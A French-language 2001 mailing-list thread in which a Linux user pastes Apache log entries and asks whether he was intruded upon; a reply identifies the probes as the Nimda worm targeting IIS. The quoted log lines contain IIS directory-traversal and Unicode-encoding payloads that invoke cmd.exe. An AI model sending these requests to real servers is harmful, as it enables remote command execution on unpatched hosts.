il s'agit de Nimda qui attaque les serveurs IIS 4 et 5 et les postes de travail sous windows avec IE5 et plus non patché
Bien à vous Philippe http://www.devparadise.com/ ----- Original Message ----- From: "Emmanuel Penove" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Sunday, September 30, 2001 9:49 PM Subject: RE: [Confirme] intrusion ou pas ??? > j'en c rien !!! jpsense pas mais bon !!!! > > d'après toi jb ????? > > c t cool samedi avec la station Solaris ? > > Manu > > -----Message d'origine----- > De : [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED]]De la part de jean-baptiste > augello > Envoyé : dimanche 30 septembre 2001 21:39 > À : [EMAIL PROTECTED] > Objet : Re: [Confirme] intrusion ou pas ??? > > > manu tu tes fait pirater ? > ----- Original Message ----- > From: "Emmanuel Penove" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> > Sent: Sunday, September 30, 2001 8:50 PM > Subject: [Confirme] intrusion ou pas ??? > > > > bonsoir , > > > > voici quelques lignes de mon fichier de log ds /var/log/httpd/access_log > > > > 217.128.30.120 - - [30/Sep/2001:20:38:14 +0200] "GET > /MSADC/root.exe?/c+dir > > HTTP/1.0" 404 269 "-" "-" > > 217.128.30.120 - - [30/Sep/2001:20:38:15 +0200] "GET > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-" > > 217.128.30.120 - - [30/Sep/2001:20:38:16 +0200] "GET > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-" > > 217.128.30.120 - - [30/Sep/2001:20:38:19 +0200] "GET > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-" > > 217.128.30.120 - - [30/Sep/2001:20:38:20 +0200] "GET > > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 310 "-" "-" > > 217.128.30.120 - - [30/Sep/2001:20:38:21 +0200] "GET > > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 310 "-" "-" > > 217.128.30.120 - - [30/Sep/2001:20:38:23 +0200] "GET > > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy > > stem32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" > > 217.128.30.120 - - [30/Sep/2001:20:38:24 +0200] "GET > > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" > "-" > > 217.128.30.120 - - [30/Sep/2001:20:38:24 +0200] "GET > > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" > "-" > > > > je ne c pas du tt comment les interpreter : la personne a t elle exécuter > > des scripts chez moi ou pas ..... en sachant que j'ai un serveur apache > ... > > > > merci de tt > > > > bonne soirée ... > > > > Manu > > > > > > > > > -------------------------------------------------------------------------- -- > ---- > > > > Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? > > Rendez-vous sur "http://www.mandrakestore.com"; > > > > > > > ---------------------------------------------------------------------------- ---- > Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? > Rendez-vous sur "http://www.mandrakestore.com"; >
Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
